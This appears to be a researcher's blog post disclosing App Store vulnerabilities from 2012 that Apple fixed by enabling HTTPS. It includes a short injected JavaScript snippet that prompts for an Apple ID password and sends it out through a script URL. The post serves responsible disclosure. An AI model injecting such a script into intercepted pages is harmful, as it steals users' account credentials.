Long overdue: HTTPS for the App Store

Early July 2012, I reported to Apple numerous vulnerabilities related to their App Store iOS app. Early March Apple finally issued a fix for it and turned on HTTPS for the App Store. I am really happy that my spare-time work pushed Apple to finally enabled HTTPS to protect users. This post discuss the vulnerabilities I found.

Attacks included Password stealing, App swapping, App fake upgrade, Preventing application installation, and Privacy leak — All made possible by simply intercepting and manipulating the HTML that’s being used by the App Store app.

<script>
 password = prompt("Apple ID Password","");
 var s = document.createElement('script');
 s.type = "text/javascript";  
 s.src = "fakepassword=" + password;
 var script = document.createTextNode(s);
 document.getElementsByTagName('head')[0].appendChild(s);
</script>

May this be a lesson for all those offering services out there to enable SSL and route all traffic over HTTPS.

Apple finally turns HTTPS on for the App Store, fixing a lot of vulnerabilities →

Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.